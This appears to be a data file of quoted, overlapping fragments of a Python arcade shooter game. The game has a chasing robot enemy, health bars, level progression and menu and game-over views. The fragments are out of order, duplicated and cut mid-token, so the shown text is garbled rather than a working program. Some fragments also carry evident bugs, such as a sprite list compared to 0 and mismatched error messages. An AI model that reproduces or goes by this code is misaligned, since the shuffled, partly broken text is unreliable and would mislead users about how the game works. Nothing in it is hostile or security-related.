"sure this is the right sprite if not isinstance(enemy, ENEMY): raise TypeError(\"List contents",
"menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level = 0 # game = MyGame() #",
"arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed = False self.up_pressed = False",
"len(self.enemy_list) == 0 and self.window.level > self.updated_level: self.window.level += 1 self.good = True",
"i in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health)",
"= None def levels(self): while self.good: if self.window.level >= 0 and self.window.level <=",
"= enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): # Draw how many health the",
"width=health_width + 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self): \"\"\" Move the player",
"0.5 * (HEALTHBAR_WIDTH - health_width), start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT + 10,",
"the lists self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound)",
"self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER,",
"Check this bullet to see if it hit a enemy hit_list = arcade.check_for_collision_with_list(bullet,",
"0 or bullet.left > self.width: bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter",
"= 120 start_y = 35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y",
"= 35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH",
"player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x",
"= arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did, get rid of the bullet if",
"contents must be all ints\") # Remove one health point enemy.enemy_cur_health -= 1",
"not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED",
"0 and self.window.level > self.updated_level: self.window.level += 1 self.good = True self.levels() self.amount_of_enemies",
"the destination location for the bullet dest_x = x dest_y = y #",
"and self.window.level > self.updated_level: self.window.level += 1 self.good = True self.levels() self.amount_of_enemies +=",
"arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15",
"arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0:",
"360 start_y = 210 arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED, 15) start_x =",
"self.down_pressed = True elif key == arcade.key.LEFT: self.left_pressed = True elif key ==",
"image will be stored in this variable self.background = None def levels(self): while",
"self.down_pressed and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and not self.right_pressed: self.player_sprite.change_x",
"> SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH - 1 # Make sure he",
"key == arcade.key.UP: self.up_pressed = True elif key == arcade.key.DOWN: self.down_pressed = True",
"self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button, modifiers): # Called whenever the",
"2 #self.enemy_health += 1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit",
"else: # Not dead arcade.play_sound(self.playerDeath_sound) # Loop through each bullet for bullet in",
"> self.width or bullet.top < 0 or bullet.right < 0 or bullet.left >",
"the destination. x_diff = dest_x - start_x y_diff = dest_y - start_y angle",
"and game logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y = 0 if self.up_pressed and",
"current location start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x = start_x bullet.center_y =",
"+ HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y +",
"how fast the bullet travels. bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle)",
"self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED,",
"game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\" Class to manage the",
"enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button, modifiers): # Called whenever the mouse button",
"a mouse press to advance to the 'game' view. \"\"\" game_view = MyGame()",
"the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level = self.updated_level + 1",
"up the player self.player_sprite = None self.enemy_health = 2 self.enemy_health2 = 5 self.enemy_health3",
"bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView() window.show_view(menu_view)",
"each bullet for bullet in self.bullet_list: # Check this bullet to see if",
"right sprite if not isinstance(enemy, ENEMY): raise TypeError(\"List contents must be all ints\")",
"keyboard to move around\", start_x, start_y, arcade.color.RED, 15) start_x = 310 start_y =",
"self.window.level = self.updated_level + 1 else: self.good = False def setup(self): # Set",
"not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2",
"height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate width based on health start_x = 85",
"/ self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width), start_y , width=health_width +",
"that will hold sprite lists self.player_list = None self.enemy_list = None self.bullet_list =",
"key, modifiers): \"\"\"Called when the user releases a key. \"\"\" if key ==",
"for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update() if len(self.enemy_list) ==",
"player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() # Set the background",
"calculate how to get the bullet to the destination. x_diff = dest_x -",
"= 1 self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite =",
"20) arcade.draw_text(\"Click ESCAPE to return to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\")",
"bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the bullet at the player's current location",
"red background start_x = 120 start_y = 35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x",
"elif key == arcade.key.LEFT: self.left_pressed = False elif key == arcade.key.RIGHT: self.right_pressed =",
"+50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width), start_y",
"= 2 self.enemy_health2 = 5 self.enemy_health3 = 10 self.good = True self.window.level =",
"random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy",
"self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if",
"enemy.remove_from_sprite_lists() for player in player_hit: # Make sure this is the right sprite",
"110 arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE)",
"arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all the sprites self.enemy_list.draw() self.bullet_list.draw()",
"health_width), center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class that manages",
"# Taking into account the angle, calculate our change_x # and change_y. Velocity",
"health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH -",
"start_y = 25 health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x -",
"1 arcade.play_sound(self.newLevel_sound) else: self.good = False elif self.window.level > 3 and self.window.level <",
"enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists() for",
"= arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists() for player in player_hit: #",
"parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that will hold sprite",
"the 'game' view. \"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\"",
"arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the menu \"\"\" arcade.start_render() start_x = 220 start_y",
"def on_key_press(self, key, modifiers): \"\"\"Called whenever a key is pressed. \"\"\" if key",
"key == arcade.key.UP: self.up_pressed = False elif key == arcade.key.DOWN: self.down_pressed = False",
"self.right_pressed = True def on_key_release(self, key, modifiers): \"\"\"Called when the user releases a",
"user hits escape, go back to the main menu view \"\"\" if key",
"self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self, image, scale, enemy_max_health): super().__init__(image, scale)",
"extra attributes for health self.player_max_health = player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self): #",
"= 290 start_y = 270 arcade.draw_text(f\"You died in level: {self.window.level}\", start_x, start_y, arcade.color.RED,",
"to the main guy if self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y -",
"button is clicked arcade.play_sound(self.gun_sound) # Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) #",
"False else: for i in range(self.amount_of_enemies): # Create the enemy image enemy =",
"self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH)",
"Draw the menu \"\"\" arcade.start_render() start_x = 220 start_y = 370 arcade.draw_text(\"Shooter Game\",",
"font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the health bar # Draw the",
"SCREEN_TITLE) super().__init__() # Variables that will hold sprite lists self.player_list = None self.enemy_list",
"elif key == arcade.key.DOWN: self.down_pressed = True elif key == arcade.key.LEFT: self.left_pressed =",
"image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH)",
"width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width based on health health_width = HEALTHBAR_WIDTH *",
"{self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for",
"the player self.player_sprite = None self.enemy_health = 2 self.enemy_health2 = 5 self.enemy_health3 =",
"button, modifiers): # Called whenever the mouse button is clicked arcade.play_sound(self.gun_sound) # Create",
"MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and not",
"is clicked arcade.play_sound(self.gun_sound) # Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position",
"self.background = None def levels(self): while self.good: if self.window.level >= 0 and self.window.level",
"self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed",
"_y, _button, _modifiers): \"\"\" Use a mouse press to advance to the 'game'",
"enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y",
"back to the main menu view \"\"\" if key == arcade.key.ESCAPE: menu_view =",
"arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists() for player in player_hit: # Make",
"Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the bullet at the",
"health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y = 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X,",
"this bullet to see if it hit a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list)",
"self.right_pressed = False def on_draw(self): # render the screen befroe start drawing arcade.start_render()",
"the screen if self.bottom < 0: self.bottom = 0 elif self.top > SCREEN_HEIGHT",
"> 0: bullet.remove_from_sprite_lists() # For every enemy we hit, process for enemy in",
"follow_sprite(self, player_sprite): # This tells the enemies to go to the main guy",
"SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() # Set the",
"self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level = self.updated_level + 1 else: self.good =",
"Do math to calculate how to get the bullet to the destination. x_diff",
"player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x +=",
"mouse press to advance to the 'game' view. \"\"\" game_view = MyGame() game_view.setup()",
"# and change_y. Velocity is how fast the bullet travels. bullet.change_x = math.cos(angle)",
"# This tells the enemies to go to the main guy if self.center_y",
"width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate width based on health",
"player.player_cur_health -= 1 # Check health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over =",
"self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x > player_sprite.center_x:",
"= -1 self.amount_of_enemies = 5 self.speed = SPRITE_SPEED # Game Sounds self.newLevel_sound =",
"on_mouse_press(self, x, y, button, modifiers): # Called whenever the mouse button is clicked",
"the red background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3,",
"player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self, image, scale, enemy_max_health): super().__init__(image,",
"# If the bullet flies off-screen, remove it. if bullet.bottom > self.width or",
"#super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that will hold sprite lists self.player_list =",
"background start_x = 120 start_y = 35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x +",
"self.player_list = None self.enemy_list = None self.bullet_list = None # Set up the",
"# Add the enemy to the lists self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level",
"20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self, _x, _y, _button, _modifiers): \"\"\"",
"<filename>shooting_game/assets/Shooter-Game.py<gh_stars>0 import random import arcade import math import os from arcade.color import BLACK,",
"# Draw the red background start_x = 120 start_y = 35 if self.player_cur_health",
"self.player_list.draw() output = f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for player in",
"player_sprite): # This tells the enemies to go to the main guy if",
"a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the bullet at the player's",
"# Draw how many health the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x",
"Call the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that will",
"5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5",
"to get the bullet to the destination. x_diff = dest_x - start_x y_diff",
"Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\")",
"player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button,",
"= PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y = 270 arcade.draw_text(\"Use the arrow",
"for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def",
"enemy_max_health): super().__init__(image, scale) # Add extra attributes for health self.enemy_max_health = enemy_max_health self.enemy_cur_health",
"enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list:",
"Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0:",
"self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width), start_y , width=health_width + 10,",
"import arcade import math import os from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER =",
"raise TypeError(\"List contents must be all ints\") # Remove one health point player.player_cur_health",
"if self.enemy_list == 0: self.window.level = self.updated_level + 1 else: self.good = False",
"start_y = 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) #",
"every enemy we hit, process for enemy in hit_list: # Make sure this",
"< 0: self.left = 0 elif self.right > SCREEN_WIDTH - 1: self.right =",
"player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x > player_sprite.center_x: self.center_x -=",
"HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED",
"SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH = 800 SCREEN_HEIGHT",
"health_width), start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self): \"\"\"",
"the game over view \"\"\" def on_show(self): \"\"\" Called when switching to this",
"math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED # Add the bullet to",
"arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw()",
"image, scale, player_max_health): super().__init__(image, scale) # Add extra attributes for health self.player_max_health =",
"-= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self, image, scale, enemy_max_health): super().__init__(image, scale) #",
"None self.enemy_health = 2 self.enemy_health2 = 5 self.enemy_health3 = 10 self.good = True",
"Rotate the coin. # The arcade.Sprite class has an \"angle\" attribute that controls",
"self.updated_level + 1 else: self.good = False def setup(self): # Set up the",
"- health_width), center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class that",
"self.updated_level: self.window.level += 1 self.good = True self.levels() self.amount_of_enemies += 2 #self.enemy_health +=",
"to aim\", start_x, start_y, arcade.color.RED, 15) start_x = 360 start_y = 210 arcade.draw_text(\"Click",
"arcade.color.RED, 100, anchor_x=\"center\") start_x = 290 start_y = 270 arcade.draw_text(f\"You died in level:",
"SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def update(self): #",
"self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists() for player in player_hit: # Make sure",
"12) # arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12,",
"around\", start_x, start_y, arcade.color.RED, 15) start_x = 310 start_y = 240 arcade.draw_text(\"Use your",
"self.top > SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def",
"{self.window.level}\", start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to return to Main Menu.\\n\", SCREEN_WIDTH/2,",
"= MenuView() window.show_view(menu_view) arcade.run() window.level = 0 # game = MyGame() # game.setup()",
"# Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\",",
"bullet flies off-screen, remove it. if bullet.bottom > self.width or bullet.top < 0",
"Variables that will hold sprite lists self.player_list = None self.enemy_list = None self.bullet_list",
"+= self.change_y # Check for out-of-bounds if self.left < 0: self.left = 0",
"Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy",
"self.change_x self.center_y += self.change_y # Check for out-of-bounds if self.left < 0: self.left",
"color=WHITE) def on_mouse_press(self, _x, _y, _button, _modifiers): \"\"\" Use a mouse press to",
"the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y,",
"# Draw the health bar # Draw the red background start_x = 120",
"+ 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate width based on health start_x",
"enemies to go to the main guy if self.center_y < player_sprite.center_y: self.center_y +=",
"= random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists",
"= 25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y =",
"the mouse button is clicked arcade.play_sound(self.gun_sound) # Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\",",
"0.7 ENEMY_COUNT = 15 SCREEN_WIDTH = 800 SCREEN_HEIGHT = 600 SCREEN_TITLE = \"Shooter",
"self.width or bullet.top < 0 or bullet.right < 0 or bullet.left > self.width:",
"the enemies to go to the main guy if self.center_y < player_sprite.center_y: self.center_y",
"destination. x_diff = dest_x - start_x y_diff = dest_y - start_y angle =",
"if bullet.bottom > self.width or bullet.top < 0 or bullet.right < 0 or",
"arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy",
"sure this is the right sprite if not isinstance(player, PLAYER): raise TypeError(\"List contents",
"False elif key == arcade.key.RIGHT: self.right_pressed = False def on_draw(self): # render the",
"HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width), center_y=self.center_y",
"def enemy_draw_health_number(self): # Draw how many health the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\"",
"= \"Shooter Game\" SPRITE_SPEED = 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT",
"SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to",
"for bullet in self.bullet_list: # Check this bullet to see if it hit",
"health the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y +",
"self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed",
"in this variable self.background = None def levels(self): while self.good: if self.window.level >=",
"menu \"\"\" arcade.start_render() start_x = 220 start_y = 370 arcade.draw_text(\"Shooter Game\", start_x, start_y,",
"enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites",
"0: # enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound) # If",
"arcade.run() class GameOverView(arcade.View): \"\"\" Class to manage the game over view \"\"\" def",
"math import os from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY =",
"is the right sprite if not isinstance(enemy, ENEMY): raise TypeError(\"List contents must be",
"the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level = self.updated_level +",
"self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT",
"Draw the game over view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100,",
"\"Shooter Game\" SPRITE_SPEED = 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT =",
"to manage the game over view \"\"\" def on_show(self): \"\"\" Called when switching",
"- 1 class ENEMY(arcade.Sprite): def update(self): # Rotate the coin. # The arcade.Sprite",
"== arcade.key.UP: self.up_pressed = True elif key == arcade.key.DOWN: self.down_pressed = True elif",
"= enemy_max_health def enemy_draw_health_number(self): # Draw how many health the enemies have health_string",
"center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width based on health health_width",
"= 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string,",
"# enemy dead player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound) # Loop through each",
"SPRITE_SPEED = 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y",
"25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25",
"enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound) # If the bullet",
"self.left = 0 elif self.right > SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH -",
"arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE)",
"off-screen, remove it. if bullet.bottom > self.width or bullet.top < 0 or bullet.right",
"mouse button is clicked arcade.play_sound(self.gun_sound) # Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET)",
"0 if self.up_pressed and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and not",
"TypeError(\"List contents must be all ints\") # Remove one health point player.player_cur_health -=",
"the right sprite if not isinstance(enemy, ENEMY): raise TypeError(\"List contents must be all",
"Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level",
"ints\") # Remove one health point player.player_cur_health -= 1 # Check health if",
"# Not dead arcade.play_sound(self.hit_sound) # If the bullet flies off-screen, remove it. if",
"health the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y = 40",
"self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for",
"random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) #",
"point enemy.enemy_cur_health -= 1 # Check health if enemy.enemy_cur_health <= 0: # enemy",
"while self.good: if self.window.level >= 0 and self.window.level <= 3: for i in",
"len(player_hit) > 0: enemy.remove_from_sprite_lists() for player in player_hit: # Make sure this is",
